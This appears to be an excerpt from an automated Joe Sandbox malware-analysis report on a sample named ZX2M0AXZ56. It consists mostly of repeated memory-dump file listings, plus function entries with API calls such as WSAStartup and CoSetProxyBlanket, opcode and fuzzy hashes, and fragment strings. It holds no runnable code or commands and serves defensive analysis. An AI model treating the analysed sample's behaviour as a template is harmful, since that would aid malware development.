Associated: 00000005.00000002.2228231721.0000000000729000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228256500.000000000072A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228285488.000000000072B000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228346256.000000000072C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228411925.000000000072F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228484856.0000000000730000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228581348.0000000000732000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228614154.0000000000740000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228648027.0000000000743000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228687913.0000000000768000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229100982.0000000000769000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229100982.0000000000773000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229169222.0000000000799000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229197341.000000000079A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229228644.000000000079B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229228644.00000000007A0000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229280139.00000000007B0000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229305809.00000000007B1000.00000080.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4b0000_ZX2M0AXZ56.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: c69d6b76b8f0133e40c5b466772ae55e81ceeea89e0855340572e820ed427282
Instruction ID: 7eb74efdeef5cafdbec9a363934775726d2e3a73834b2c35facabd216eec5fce
Opcode Fuzzy Hash: c69d6b76b8f0133e40c5b466772ae55e81ceeea89e0855340572e820ed427282
Instruction Fuzzy Hash: 7DF0DAB4209701CFE344DF28D5A471ABBF0FB88304F10885CE4968B3A0CB75AA58CF82

Function 004E28EB Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 004E292F

Memory Dump Source

Source File: 00000005.00000002.2224104260.00000000004B1000.00000040.00000001.01000000.00000004.sdmp, Offset: 004B0000, based on PE: true

Associated: 00000005.00000002.2224080854.00000000004B0000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224104260.00000000004F5000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224181969.0000000000505000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224209201.000000000050F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224240043.0000000000510000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2225291886.0000000000511000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226189454.0000000000667000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226233536.0000000000669000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226272697.000000000067F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226323228.0000000000680000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226356827.0000000000682000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226356827.000000000068B000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226468789.00000000006A0000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226510209.00000000006A2000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226546451.00000000006A4000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226598348.00000000006A6000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226646950.00000000006BD000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226674291.00000000006BE000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226715100.00000000006C1000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226752674.00000000006D4000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226802845.00000000006EA000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226842232.00000000006ED000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226866882.00000000006EE000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226930910.00000000006F2000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226966213.00000000006F3000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226994315.00000000006F4000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227025296.00000000006FC000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227062533.00000000006FD000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227087749.00000000006FE000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227114102.0000000000703000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227139414.0000000000704000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227166211.0000000000709000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227191509.0000000000711000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227217835.0000000000714000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228196112.0000000000721000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228231721.0000000000729000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228256500.000000000072A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228285488.000000000072B000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228346256.000000000072C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228411925.000000000072F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228484856.0000000000730000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228581348.0000000000732000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228614154.0000000000740000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228648027.0000000000743000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228687913.0000000000768000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229100982.0000000000769000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229100982.0000000000773000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229169222.0000000000799000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229197341.000000000079A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229228644.000000000079B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229228644.00000000007A0000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229280139.00000000007B0000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229305809.00000000007B1000.00000080.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4b0000_ZX2M0AXZ56.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: c05f43524662f995b24839caf88fd0efd5b2073984088e31aba07388e40621e9
Instruction ID: 77702fecac514a037c97fd7f02f6749e4dcf466f3d0882611e2dbee19e0560a7
Opcode Fuzzy Hash: c05f43524662f995b24839caf88fd0efd5b2073984088e31aba07388e40621e9
Instruction Fuzzy Hash: F7F07A745083418FD314DF24C5A871BBBE0BB84308F10891DE5998B390C7B59559CF82

Function 004B9EB7 Relevance: 1.5, APIs: 1, Instructions: 18networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000202,?), ref: 004B9ED2

Memory Dump Source

Source File: 00000005.00000002.2224104260.00000000004B1000.00000040.00000001.01000000.00000004.sdmp, Offset: 004B0000, based on PE: true

Associated: 00000005.00000002.2224080854.00000000004B0000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224104260.00000000004F5000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224181969.0000000000505000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224209201.000000000050F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224240043.0000000000510000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2225291886.0000000000511000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226189454.0000000000667000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226233536.0000000000669000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226272697.000000000067F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226323228.0000000000680000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226356827.0000000000682000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226356827.000000000068B000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226468789.00000000006A0000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226510209.00000000006A2000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226546451.00000000006A4000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226598348.00000000006A6000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226646950.00000000006BD000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226674291.00000000006BE000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226715100.00000000006C1000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226752674.00000000006D4000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226802845.00000000006EA000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226842232.00000000006ED000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226866882.00000000006EE000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226930910.00000000006F2000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226966213.00000000006F3000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226994315.00000000006F4000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227025296.00000000006FC000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227062533.00000000006FD000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227087749.00000000006FE000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227114102.0000000000703000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227139414.0000000000704000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227166211.0000000000709000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227191509.0000000000711000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227217835.0000000000714000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228196112.0000000000721000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228231721.0000000000729000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228256500.000000000072A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228285488.000000000072B000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228346256.000000000072C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228411925.000000000072F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228484856.0000000000730000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228581348.0000000000732000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228614154.0000000000740000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228648027.0000000000743000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228687913.0000000000768000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229100982.0000000000769000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229100982.0000000000773000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229169222.0000000000799000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229197341.000000000079A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229228644.000000000079B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229228644.00000000007A0000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229280139.00000000007B0000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229305809.00000000007B1000.00000080.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4b0000_ZX2M0AXZ56.jbxd

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: 082a26bdbfbd95bc038937dce31465925cffb8236887c31f70dd89087e485fbb
Instruction ID: 0473881d8749e85769a7ef375932c9bb0736fa42db6d375406fd4a2953e99c8e
Opcode Fuzzy Hash: 082a26bdbfbd95bc038937dce31465925cffb8236887c31f70dd89087e485fbb
Instruction Fuzzy Hash: 1EE02B736406029BD700DB38FC47E693357DB553467068439E605C1171EA72A430DA14

Function 004EC570 Relevance: 1.5, APIs: 1, Instructions: 15memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,00000000,?,004EE0F9), ref: 004EC590

Memory Dump Source

Source File: 00000005.00000002.2224104260.00000000004B1000.00000040.00000001.01000000.00000004.sdmp, Offset: 004B0000, based on PE: true

Associated: 00000005.00000002.2224080854.00000000004B0000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224104260.00000000004F5000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224181969.0000000000505000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224209201.000000000050F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224240043.0000000000510000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2225291886.0000000000511000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226189454.0000000000667000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226233536.0000000000669000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226272697.000000000067F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226323228.0000000000680000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226356827.0000000000682000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226356827.000000000068B000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226468789.00000000006A0000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226510209.00000000006A2000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226546451.00000000006A4000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226598348.00000000006A6000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226646950.00000000006BD000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226674291.00000000006BE000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226715100.00000000006C1000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226752674.00000000006D4000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226802845.00000000006EA000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226842232.00000000006ED000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226866882.00000000006EE000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226930910.00000000006F2000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226966213.00000000006F3000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226994315.00000000006F4000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227025296.00000000006FC000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227062533.00000000006FD000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227087749.00000000006FE000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227114102.0000000000703000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227139414.0000000000704000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227166211.0000000000709000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227191509.0000000000711000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227217835.0000000000714000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228196112.0000000000721000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228231721.0000000000729000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228256500.000000000072A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228285488.000000000072B000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228346256.000000000072C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228411925.000000000072F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228484856.0000000000730000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228581348.0000000000732000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228614154.0000000000740000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228648027.0000000000743000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228687913.0000000000768000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229100982.0000000000769000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229100982.0000000000773000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229169222.0000000000799000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229197341.000000000079A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229228644.000000000079B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229228644.00000000007A0000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229280139.00000000007B0000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229305809.00000000007B1000.00000080.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4b0000_ZX2M0AXZ56.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 4c879d11896cebc382b10f02faeeb223505864200bcf529e8ef86d2248a80d7c
Instruction ID: 22fc7de55699721c32fbfd81e1584d3e12663e7d8e6bff2927b47e0399df0a4a
Opcode Fuzzy Hash: 4c879d11896cebc382b10f02faeeb223505864200bcf529e8ef86d2248a80d7c
Instruction Fuzzy Hash: 78D01231415132FBC6102F29BC05BDB3B54DF59321F0708A2F444AA075CB25EC91DAD4

Function 004EC55C Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000), ref: 004EC561

Memory Dump Source

Source File: 00000005.00000002.2224104260.00000000004B1000.00000040.00000001.01000000.00000004.sdmp, Offset: 004B0000, based on PE: true

Associated: 00000005.00000002.2224080854.00000000004B0000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224104260.00000000004F5000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224181969.0000000000505000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224209201.000000000050F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224240043.0000000000510000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2225291886.0000000000511000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226189454.0000000000667000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226233536.0000000000669000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226272697.000000000067F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226323228.0000000000680000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226356827.0000000000682000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226356827.000000000068B000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226468789.00000000006A0000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226510209.00000000006A2000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226546451.00000000006A4000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226598348.00000000006A6000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226646950.00000000006BD000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226674291.00000000006BE000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226715100.00000000006C1000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226752674.00000000006D4000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226802845.00000000006EA000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226842232.00000000006ED000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226866882.00000000006EE000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226930910.00000000006F2000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226966213.00000000006F3000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226994315.00000000006F4000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227025296.00000000006FC000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227062533.00000000006FD000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227087749.00000000006FE000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227114102.0000000000703000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227139414.0000000000704000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227166211.0000000000709000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227191509.0000000000711000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227217835.0000000000714000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228196112.0000000000721000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228231721.0000000000729000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228256500.000000000072A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228285488.000000000072B000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228346256.000000000072C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228411925.000000000072F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228484856.0000000000730000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228581348.0000000000732000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228614154.0000000000740000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228648027.0000000000743000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228687913.0000000000768000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229100982.0000000000769000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229100982.0000000000773000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229169222.0000000000799000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229197341.000000000079A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229228644.000000000079B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229228644.00000000007A0000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229280139.00000000007B0000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229305809.00000000007B1000.00000080.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4b0000_ZX2M0AXZ56.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 3d2e11549d67db5f34bbd98719c9330b84d91cd40a2321c20b860d93e2332cfb
Instruction ID: 616a7957ea6e66f27150172a8ade657e95a797a25405532034f46ee48cdf639d
Opcode Fuzzy Hash: 3d2e11549d67db5f34bbd98719c9330b84d91cd40a2321c20b860d93e2332cfb
Instruction Fuzzy Hash: 67A001711845109ADA562B24BC09B887A21AB68621F124192E101590B68A62989AAA84

Non-executed Functions

Function 004D42D0 Relevance: 43.1, APIs: 2, Strings: 22, Instructions: 1129COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 004D43AA
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 004D443E

Strings

13, xrefs: 004D5BFC
uw, xrefs: 004D5B57
e>n<, xrefs: 004D588E
|r, xrefs: 004D53A8
Xs, xrefs: 004D5CD8
+$e, xrefs: 004D4365, 004D437A
gd, xrefs: 004D5E60
bFM, xrefs: 004D464E
%r?p, xrefs: 004D595F
y{, xrefs: 004D5B36
tj, xrefs: 004D53BE
=:, xrefs: 004D57CE
DD, xrefs: 004D5CEE
N~4|, xrefs: 004D593E
r:i8, xrefs: 004D5899
n l, xrefs: 004D596A
<j:h, xrefs: 004D5975
REM, xrefs: 004D4542
=?, xrefs: 004D5BF1
b`, xrefs: 004D55F9
+$e, xrefs: 004D43FA, 004D442B
ut, xrefs: 004D5CE3

Memory Dump Source

Source File: 00000005.00000002.2224104260.00000000004B1000.00000040.00000001.01000000.00000004.sdmp, Offset: 004B0000, based on PE: true

Associated: 00000005.00000002.2224080854.00000000004B0000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224104260.00000000004F5000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224181969.0000000000505000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224209201.000000000050F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224240043.0000000000510000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2225291886.0000000000511000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226189454.0000000000667000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226233536.0000000000669000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226272697.000000000067F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226323228.0000000000680000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226356827.0000000000682000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226356827.000000000068B000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226468789.00000000006A0000.00000080.00000001.01000000.00000004.sdmpDownload File
